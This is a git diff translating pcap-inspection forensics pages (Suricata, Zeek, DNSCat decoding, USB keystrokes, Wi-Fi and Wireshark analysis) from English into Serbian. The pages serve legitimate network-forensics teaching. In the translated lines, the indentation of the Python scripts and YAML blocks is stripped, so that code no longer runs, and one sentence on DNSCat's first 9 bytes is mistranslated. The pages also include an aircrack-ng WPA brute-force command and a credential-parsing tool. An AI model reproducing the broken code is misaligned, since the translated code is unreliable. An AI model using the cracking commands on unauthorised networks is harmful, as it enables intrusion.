+Korišćenje uobičajenih tehnika isecanja može biti korisno za ekstrakciju fajlova i informacija iz pcap:
 
 {{#ref}}
 ../partitions-file-systems-carving/file-data-carving-recovery-tools.md
 {{#endref}}
 
-### Capturing credentials
+### Hvatanje kredencijala
 
-You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
+Možete koristiti alate kao što je [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) za parsiranje kredencijala iz pcap-a ili sa aktivnog interfejsa.
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
-## Check Exploits/Malware
+## Proverite Eksploite/Malver
 
 ### Suricata
 
-**Install and setup**
-
+**Instalirajte i postavite**
 ```
 apt-get install suricata
 apt-get install oinkmaster
 echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
 oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
 ```
-
-**Check pcap**
-
+**Proveri pcap**
 ```
 suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
 ```
-
 ### YaraPcap
 
-[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that
+[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) je alat koji
 
-- Reads a PCAP File and Extracts Http Streams.
-- gzip deflates any compressed streams
-- Scans every file with yara
-- Writes a report.txt
-- Optionally saves matching files to a Dir
+- Čita PCAP datoteku i ekstrahuje Http tokove.
+- gzip dekompresuje sve kompresovane tokove
+- Skandira svaku datoteku sa yara
+- Piše report.txt
+- Opcionalno čuva odgovarajuće datoteke u direktorijum
 
 ### Malware Analysis
 
-Check if you can find any fingerprint of a known malware:
+Proverite da li možete pronaći bilo koji otisak poznatog malvera:
 
 {{#ref}}
 ../malware-analysis.md
@@ -151,12 +127,11 @@ Check if you can find any fingerprint of a known malware:
 
 ## Zeek
 
-> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting.
+> [Zeek](https://docs.zeek.org/en/master/about.html) je pasivni, open-source analizator mrežnog saobraćaja. Mnogi operateri koriste Zeek kao Mrežni Sigurnosni Monitor (NSM) za podršku istragama sumnjivih ili zlonamernih aktivnosti. Zeek takođe podržava širok spektar zadataka analize saobraćaja van domena sigurnosti, uključujući merenje performansi i rešavanje problema.
 
-Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are.
+U suštini, logovi koje kreira `zeek` nisu **pcaps**. Stoga ćete morati da koristite **druge alate** za analizu logova gde se nalaze **informacije** o pcaps. 
 
 ### Connections Info
-
 ```bash
 #Get info about longest connections (add "grep udp" to see only udp traffic)
 #The longest connection might be of malware (constant reverse shell?)
@@ -206,9 +181,7 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
 1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0
 0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
 ```
-
-### DNS info
-
+### DNS informacije
 ```bash
 #Get info about each DNS request performed
 cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
@@ -225,8 +198,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
 #See top DNS domain requested with rita
 rita show-exploded-dns -H --limit 10 zeek_logs
 ```
-
-## Other pcap analysis tricks
+## Ostali trikovi analize pcap-a
 
 {{#ref}}
 dnscat-exfiltration.md
@@ -242,10 +214,4 @@ usb-keystrokes.md
 
 ​
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
index aba634f34..138792211 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
@@ -1,11 +1,10 @@
-# DNSCat pcap analysis
+# DNSCat pcap analiza
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
-
-You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**:
+Ako imate pcap sa podacima koji se **ekstrahuju putem DNSCat** (bez korišćenja enkripcije), možete pronaći ekstrahovani sadržaj.
 
+Samo treba da znate da su **prvih 9 bajtova** lažni podaci, već su povezani sa **C\&C komunikacijom**:
 ```python
 from scapy.all import rdpcap, DNSQR, DNSRR
 import struct
@@ -13,25 +12,22 @@ import struct
 f = ""
 last = ""
 for p in rdpcap('ch21.pcap'):
-	if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
+if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
 
-		qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
-		qry = ''.join(_.decode('hex') for _ in qry)[9:]
-		if last != qry:
-			print(qry)
-			f += qry
-		last = qry
+qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
+qry = ''.join(_.decode('hex') for _ in qry)[9:]
+if last != qry:
+print(qry)
+f += qry
+last = qry
 
 #print(f)
 ```
-
-For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
+Za više informacija: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
 [https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
 
-There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
-
+Postoji skripta koja radi sa Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
 ```
 python3 dnscat_decoder.py sample.pcap bad_domain
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md
index 4be42c696..45a7512b8 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/suricata-and-iptables-cheatsheet.md
@@ -6,14 +6,13 @@
 
 ### Chains
 
-In iptables, lists of rules known as chains are processed sequentially. Among these, three primary chains are universally present, with additional ones like NAT being potentially supported depending on the system's capabilities.
+U iptables-u, liste pravila poznate kao lanci se obrađuju sekvencijalno. Među njima, tri primarna lanca su univerzalno prisutna, dok dodatni kao što je NAT mogu biti potencijalno podržani u zavisnosti od mogućnosti sistema.
 
-- **Input Chain**: Utilized for managing the behavior of incoming connections.
-- **Forward Chain**: Employed for handling incoming connections that are not destined for the local system. This is typical for devices acting as routers, where the data received is meant to be forwarded to another destination. This chain is relevant primarily when the system is involved in routing, NATing, or similar activities.
-- **Output Chain**: Dedicated to the regulation of outgoing connections.
-
-These chains ensure the orderly processing of network traffic, allowing for the specification of detailed rules governing the flow of data into, through, and out of a system.
+- **Input Chain**: Koristi se za upravljanje ponašanjem dolaznih konekcija.
+- **Forward Chain**: Koristi se za rukovanje dolaznim konekcijama koje nisu namenjene lokalnom sistemu. Ovo je tipično za uređaje koji deluju kao ruteri, gde su podaci koji se primaju namenjeni za prosleđivanje na drugu destinaciju. Ovaj lanac je relevantan prvenstveno kada je sistem uključen u rutiranje, NAT-ovanje ili slične aktivnosti.
+- **Output Chain**: Posvećen regulaciji odlaznih konekcija.
 
+Ovi lanci osiguravaju urednu obradu mrežnog saobraćaja, omogućavajući precizno definisanje detaljnih pravila koja upravljaju protokom podataka u, kroz i iz sistema.
 ```bash
 # Delete all rules
 iptables -F
@@ -50,11 +49,9 @@ iptables-save > /etc/sysconfig/iptables
 ip6tables-save > /etc/sysconfig/ip6tables
 iptables-restore < /etc/sysconfig/iptables
 ```
-
 ## Suricata
 
-### Install & Config
-
+### Instalacija i Konfiguracija
 ```bash
 # Install details from: https://suricata.readthedocs.io/en/suricata-6.0.0/install.html#install-binary-packages
 # Ubuntu
@@ -64,7 +61,7 @@ apt-get install suricata
 
 # Debian
 echo "deb http://http.debian.net/debian buster-backports main" > \
-    /etc/apt/sources.list.d/backports.list
+/etc/apt/sources.list.d/backports.list
 apt-get update
 apt-get install suricata -t buster-backports
 
@@ -80,7 +77,7 @@ suricata-update
 ## To use the dowloaded rules update the following line in /etc/suricata/suricata.yaml
 default-rule-path: /var/lib/suricata/rules
 rule-files:
-  - suricata.rules
+- suricata.rules
 
 # Run
 ## Add rules in /etc/suricata/rules/suricata.rules
@@ -92,7 +89,7 @@ suricata -c /etc/suricata/suricata.yaml -i eth0
 suricatasc -c ruleset-reload-nonblocking
 ## or set the follogin in /etc/suricata/suricata.yaml
 detect-engine:
-  - rule-reload: true
+- rule-reload: true
 
 # Validate suricata config
 suricata -T -c /etc/suricata/suricata.yaml -v
@@ -101,8 +98,8 @@ suricata -T -c /etc/suricata/suricata.yaml -v
 ## Config drop to generate alerts
 ## Search for the following lines in /etc/suricata/suricata.yaml and remove comments:
 - drop:
-    alerts: yes
-    flows: all
+alerts: yes
+flows: all
 
 ## Forward all packages to the queue where suricata can act as IPS
 iptables -I INPUT -j NFQUEUE
@@ -120,76 +117,70 @@ Type=simple
 
 systemctl daemon-reload
 ```
+### Pravila Definicije
 
-### Rules Definitions
-
-[From the docs:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) A rule/signature consists of the following:
-
-- The **action**, determines what happens when the signature matches.
-- The **header**, defines the protocol, IP addresses, ports and direction of the rule.
-- The **rule options**, define the specifics of the rule.
+[Iz dokumenata:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) Pravilo/potpis se sastoji od sledećeg:
 
+- **akcija**, određuje šta se dešava kada se potpis poklapa.
+- **zaglavlje**, definiše protokol, IP adrese, portove i pravac pravila.
+- **opcije pravila**, definišu specifičnosti pravila.
 ```bash
 alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"HTTP GET Request Containing Rule in URI"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"rule"; fast_pattern; classtype:bad-unknown; sid:123; rev:1;)
 ```
+#### **Validne akcije su**
 
-#### **Valid actions are**
+- alert - generiši upozorenje
+- pass - zaustavi dalju inspekciju paketa
+- **drop** - odbaci paket i generiši upozorenje
+- **reject** - pošalji RST/ICMP grešku nedostupnosti pošiljaocu odgovarajućeg paketa.
+- rejectsrc - isto kao _reject_
+- rejectdst - pošalji RST/ICMP grešku paketa primaocu odgovarajućeg paketa.
+- rejectboth - pošalji RST/ICMP greške paketa obe strane razgovora.
 
-- alert - generate an alert
-- pass - stop further inspection of the packet
-- **drop** - drop packet and generate alert
-- **reject** - send RST/ICMP unreachable error to the sender of the matching packet.
-- rejectsrc - same as just _reject_
-- rejectdst - send RST/ICMP error packet to the receiver of the matching packet.
-- rejectboth - send RST/ICMP error packets to both sides of the conversation.
+#### **Protokoli**
 
-#### **Protocols**
-
-- tcp (for tcp-traffic)
+- tcp (za tcp-traffic)
 - udp
 - icmp
-- ip (ip stands for ‘all’ or ‘any’)
-- _layer7 protocols_: http, ftp, tls, smb, dns, ssh... (more in the [**docs**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html))
+- ip (ip znači ‘svi’ ili ‘bilo koji’)
+- _layer7 protokoli_: http, ftp, tls, smb, dns, ssh... (više u [**docs**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html))
 
-#### Source and Destination Addresses
+#### Izvori i odredišne adrese
 
-It supports IP ranges, negations and a list of addresses:
+Podržava IP opsege, negacije i listu adresa:
 
-| Example                       | Meaning                                  |
-| ----------------------------- | ---------------------------------------- |
-| ! 1.1.1.1                     | Every IP address but 1.1.1.1             |
-| !\[1.1.1.1, 1.1.1.2]          | Every IP address but 1.1.1.1 and 1.1.1.2 |
-| $HOME_NET                     | Your setting of HOME_NET in yaml         |
-| \[$EXTERNAL\_NET, !$HOME_NET] | EXTERNAL_NET and not HOME_NET            |
-| \[10.0.0.0/24, !10.0.0.5]     | 10.0.0.0/24 except for 10.0.0.5          |
+| Primer                        | Značenje                                  |
+| ----------------------------- | ----------------------------------------- |
+| ! 1.1.1.1                     | Svaka IP adresa osim 1.1.1.1             |
+| !\[1.1.1.1, 1.1.1.2]          | Svaka IP adresa osim 1.1.1.1 i 1.1.1.2   |
+| $HOME_NET                     | Vaša postavka HOME_NET u yaml            |
+| \[$EXTERNAL\_NET, !$HOME_NET] | EXTERNAL_NET i ne HOME_NET                |
+| \[10.0.0.0/24, !10.0.0.5]     | 10.0.0.0/24 osim 10.0.0.5                |
 
-#### Source and Destination Ports
+#### Izvori i odredišne portove
 
-It supports port ranges, negations and lists of ports
+Podržava opsege portova, negacije i liste portova
 
-| Example         | Meaning                                |
+| Primer         | Značenje                                |
 | --------------- | -------------------------------------- |
-| any             | any address                            |
-| \[80, 81, 82]   | port 80, 81 and 82                     |
-| \[80: 82]       | Range from 80 till 82                  |
-| \[1024: ]       | From 1024 till the highest port-number |
-| !80             | Every port but 80                      |
-| \[80:100,!99]   | Range from 80 till 100 but 99 excluded |
-| \[1:80,!\[2,4]] | Range from 1-80, except ports 2 and 4  |
+| any             | bilo koja adresa                       |
+| \[80, 81, 82]   | port 80, 81 i 82                       |
+| \[80: 82]       | Opseg od 80 do 82                      |
+| \[1024: ]       | Od 1024 do najvećeg broja porta       |
+| !80             | Svaki port osim 80                     |
+| \[80:100,!99]   | Opseg od 80 do 100 osim 99             |
+| \[1:80,!\[2,4]] | Opseg od 1-80, osim portova 2 i 4      |
 
-#### Direction
-
-It's possible to indicate the direction of the communication rule being applied:
+#### Smer
 
+Moguće je naznačiti smer komunikacijske pravila koja se primenjuje:
 ```
 source -> destination
 source <> destination  (both directions)
 ```
+#### Ključne reči
 
-#### Keywords
-
-There are **hundreds of options** available in Suricata to search for the **specific packet** you are looking for, here it will be mentioned if something interesting is found. Check the [**documentation** ](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html)for more!
-
+Postoji **stotine opcija** dostupnih u Suricati za pretragu **specifičnog paketa** koji tražite, ovde će biti pomenuto ako se pronađe nešto zanimljivo. Proverite [**dokumentaciju**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html) za više informacija!
 ```bash
 # Meta Keywords
 msg: "description"; #Set a description to the rule
@@ -230,5 +221,4 @@ drop tcp any any -> any any (msg:"regex"; pcre:"/CTF\{[\w]{3}/i"; sid:10001;)
 ## Drop by port
 drop tcp any any -> any 8000 (msg:"8000 port"; sid:1000;)
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
index 782e405aa..ee1b4dfc4 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
@@ -2,18 +2,16 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-If you have a pcap containing the communication via USB of a keyboard like the following one:
+Ako imate pcap koji sadrži komunikaciju putem USB-a tastature kao što je sledeća:
 
 ![](<../../../images/image (962).png>)
 
-You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/TeamRocketIst/ctf-usb-keyboard-parser) to get what was written in the communication:
-
+Možete koristiti alat [**ctf-usb-keyboard-parser**](https://github.com/TeamRocketIst/ctf-usb-keyboard-parser) da dobijete ono što je napisano u komunikaciji:
 ```bash
 tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
 python3 usbkeyboard.py ./keystrokes.txt
 ```
-
-You can read more information and find some scripts about how to analyse this in:
+Možete pročitati više informacija i pronaći neke skripte o tome kako analizirati ovo na:
 
 - [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
 - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
index f1371d5fa..c331e1298 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
@@ -1,10 +1,10 @@
-# Wifi Pcap Analysis
+# Wifi Pcap Analiza
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Check BSSIDs
+## Proverite BSSID-ove
 
-When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:
+Kada primite snimak čiji je glavni saobraćaj Wifi koristeći WireShark, možete početi da istražujete sve SSID-ove snimka sa _Wireless --> WLAN Traffic_:
 
 ![](<../../../images/image (106).png>)
 
@@ -12,29 +12,27 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c
 
 ### Brute Force
 
-One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`:
-
+Jedna od kolona tog ekrana pokazuje da li je **bilo kakva autentifikacija pronađena unutar pcap-a**. Ako je to slučaj, možete pokušati da je brute force-ujete koristeći `aircrack-ng`:
 ```bash
 aircrack-ng -w pwds-file.txt -b  file.pcap
 ```
+Na primer, dobiće WPA lozinku koja štiti PSK (pre shared-key), koja će biti potrebna za dekriptovanje saobraćaja kasnije.
 
-For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later.
+## Podaci u Beacon-ima / Sporedni Kanal
 
-## Data in Beacons / Side Channel
+Ako sumnjate da se **podaci curi unutar beacon-a Wifi mreže**, možete proveriti beacon-e mreže koristeći filter kao što je sledeći: `wlan contains `, ili `wlan.ssid == "NAMEofNETWORK"` pretražujući unutar filtriranih paketa za sumnjive stringove.
 
-If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings.
+## Pronađite Nepoznate MAC Adrese u Wifi Mreži
 
-## Find Unknown MAC Addresses in A Wifi Network
-
-The following link will be useful to find the **machines sending data inside a Wifi Network**:
+Sledeći link će biti koristan za pronalaženje **mašina koje šalju podatke unutar Wifi mreže**:
 
 - `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
 
-If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
+Ako već znate **MAC adrese, možete ih ukloniti iz izlaza** dodajući provere kao što je ova: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
 
-Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr== && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic.
+Kada detektujete **nepoznate MAC** adrese koje komuniciraju unutar mreže, možete koristiti **filtre** kao što je sledeći: `wlan.addr== && (ftp || http || ssh || telnet)` da filtrirate njihov saobraćaj. Imajte na umu da su ftp/http/ssh/telnet filteri korisni ako ste dekriptovali saobraćaj.
 
-## Decrypt Traffic
+## Dekriptovanje Saobraćaja
 
 Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
index 6565bd680..68b3b68aa 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
@@ -1,157 +1,155 @@
-# Wireshark tricks
+# Wireshark trikovi
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Improve your Wireshark skills
+## Poboljšajte svoje veštine u Wireshark-u
 
-### Tutorials
+### Tutorijali
 
-The following tutorials are amazing to learn some cool basic tricks:
+Sledeći tutorijali su sjajni za učenje nekih cool osnovnih trikova:
 
 - [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
 - [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
 - [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
 - [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
 
-### Analysed Information
+### Analizirane informacije
 
-**Expert Information**
+**Stručne informacije**
 
-Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analyzed**:
+Klikom na _**Analiziraj** --> **Stručne informacije**_ dobićete **pregled** onoga što se dešava u **analiziranim** paketima:
 
 ![](<../../../images/image (256).png>)
 
-**Resolved Addresses**
+**Rešene adrese**
 
-Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, MAC to the manufacturer, etc. It is interesting to know what is implicated in the communication.
+Pod _**Statistika --> Rešene adrese**_ možete pronaći nekoliko **informacija** koje je wireshark "**rešio**", kao što su port/transport do protokola, MAC do proizvođača itd. Zanimljivo je znati šta je uključeno u komunikaciju.
 
 ![](<../../../images/image (893).png>)
 
-**Protocol Hierarchy**
+**Hijerarhija protokola**
 
-Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them.
+Pod _**Statistika --> Hijerarhija protokola**_ možete pronaći **protokole** **uključene** u komunikaciju i podatke o njima.
 
 ![](<../../../images/image (586).png>)
 
-**Conversations**
+**Razgovori**
 
-Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them.
+Pod _**Statistika --> Razgovori**_ možete pronaći **rezime razgovora** u komunikaciji i podatke o njima.
 
 ![](<../../../images/image (453).png>)
 
-**Endpoints**
+**Krajnje tačke**
 
-Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them.
+Pod _**Statistika --> Krajnje tačke**_ možete pronaći **rezime krajnjih tačaka** u komunikaciji i podatke o svakoj od njih.
 
 ![](<../../../images/image (896).png>)
 
-**DNS info**
+**DNS informacije**
 
-Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured.
+Pod _**Statistika --> DNS**_ možete pronaći statistiku o uhvaćenim DNS zahtevima.
 
 ![](<../../../images/image (1063).png>)
 
-**I/O Graph**
+**I/O graf**
 
-Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.**
+Pod _**Statistika --> I/O graf**_ možete pronaći **graf komunikacije.**
 
 ![](<../../../images/image (992).png>)
 
-### Filters
+### Filteri
 
-Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
-Other interesting filters:
+Ovde možete pronaći wireshark filtere u zavisnosti od protokola: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
+Ostali zanimljivi filteri:
 
 - `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
-  - HTTP and initial HTTPS traffic
+- HTTP i inicijalni HTTPS saobraćaj
 - `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
-  - HTTP and initial HTTPS traffic + TCP SYN
+- HTTP i inicijalni HTTPS saobraćaj + TCP SYN
 - `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
-  - HTTP and initial HTTPS traffic + TCP SYN + DNS requests
+- HTTP i inicijalni HTTPS saobraćaj + TCP SYN + DNS zahtevi
 
-### Search
+### Pretraga
 
-If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_. You can add new layers to the main information bar (No., Time, Source, etc.) by pressing the right button and then the edit column.
+Ako želite da **pretražujete** **sadržaj** unutar **paketa** sesija pritisnite _CTRL+f_. Možete dodati nove slojeve u glavnu informativnu traku (Br., Vreme, Izvor itd.) pritiskom desnog dugmeta i zatim uređivanjem kolone.
 
-### Free pcap labs
+### Besplatni pcap laboratoriji
 
-**Practice with the free challenges of:** [**https://www.malware-traffic-analysis.net/**](https://www.malware-traffic-analysis.net)
+**Vežbajte sa besplatnim izazovima:** [**https://www.malware-traffic-analysis.net/**](https://www.malware-traffic-analysis.net)
 
-## Identifying Domains
+## Identifikacija domena
 
-You can add a column that shows the Host HTTP header:
+Možete dodati kolonu koja prikazuje Host HTTP zaglavlje:
 
 ![](<../../../images/image (639).png>)
 
-And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):
+I kolonu koja dodaje ime servera iz inicijalne HTTPS veze (**ssl.handshake.type == 1**):
 
 ![](<../../../images/image (408) (1).png>)
 
-## Identifying local hostnames
+## Identifikacija lokalnih imena hostova
 
-### From DHCP
+### Iz DHCP
 
-In current Wireshark instead of `bootp` you need to search for `DHCP`
+U trenutnom Wireshark-u umesto `bootp` treba da tražite `DHCP`
 
 ![](<../../../images/image (1013).png>)
 
-### From NBNS
+### Iz NBNS
 
 ![](<../../../images/image (1003).png>)
 
-## Decrypting TLS
+## Dekriptovanje TLS
 
-### Decrypting https traffic with server private key
+### Dekriptovanje https saobraćaja sa privatnim ključem servera
 
 _edit>preference>protocol>ssl>_
 
 ![](<../../../images/image (1103).png>)
 
-Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_)
+Pritisnite _Edit_ i dodajte sve podatke o serveru i privatnom ključu (_IP, Port, Protokol, Datoteka ključa i lozinka_)
 
-### Decrypting https traffic with symmetric session keys
+### Dekriptovanje https saobraćaja sa simetričnim sesijskim ključevima
 
-Both Firefox and Chrome have the capability to log TLS session keys, which can be used with Wireshark to decrypt TLS traffic. This allows for in-depth analysis of secure communications. More details on how to perform this decryption can be found in a guide at [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
+I Firefox i Chrome imaju mogućnost da beleže TLS sesijske ključeve, koji se mogu koristiti sa Wireshark-om za dekriptovanje TLS saobraćaja. Ovo omogućava dubinsku analizu sigurnih komunikacija. Više detalja o tome kako izvršiti ovo dekriptovanje može se naći u vodiču na [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
 
-To detect this search inside the environment for to variable `SSLKEYLOGFILE`
+Da biste to otkrili, pretražujte unutar okruženja za promenljivu `SSLKEYLOGFILE`
 
-A file of shared keys will look like this:
+Datoteka deljenih ključeva će izgledati ovako:
 
 ![](<../../../images/image (820).png>)
 
-To import this in wireshark go to \_edit > preference > protocol > ssl > and import it in (Pre)-Master-Secret log filename:
+Da biste to uvezli u wireshark idite na \_edit > preference > protocol > ssl > i uvezite to u (Pre)-Master-Secret log filename:
 
 ![](<../../../images/image (989).png>)
 
-## ADB communication
-
-Extract an APK from an ADB communication where the APK was sent:
+## ADB komunikacija
 
+Izvucite APK iz ADB komunikacije gde je APK poslat:
 ```python
 from scapy.all import *
 
 pcap = rdpcap("final2.pcapng")
 
 def rm_data(data):
-    splitted = data.split(b"DATA")
-    if len(splitted) == 1:
-        return data
-    else:
-        return splitted[0]+splitted[1][4:]
+splitted = data.split(b"DATA")
+if len(splitted) == 1:
+return data
+else:
+return splitted[0]+splitted[1][4:]
 
 all_bytes = b""
 for pkt in pcap:
-    if Raw in pkt:
-        a = pkt[Raw]
-        if b"WRTE" == bytes(a)[:4]:
-            all_bytes += rm_data(bytes(a)[24:])
-        else:
-            all_bytes += rm_data(bytes(a))
+if Raw in pkt:
+a = pkt[Raw]
+if b"WRTE" == bytes(a)[:4]:
+all_bytes += rm_data(bytes(a)[24:])
+else:
+all_bytes += rm_data(bytes(a))
 print(all_bytes)
 
 f = open('all_bytes.data', 'w+b')
 f.write(all_bytes)
 f.close()
 ```
-
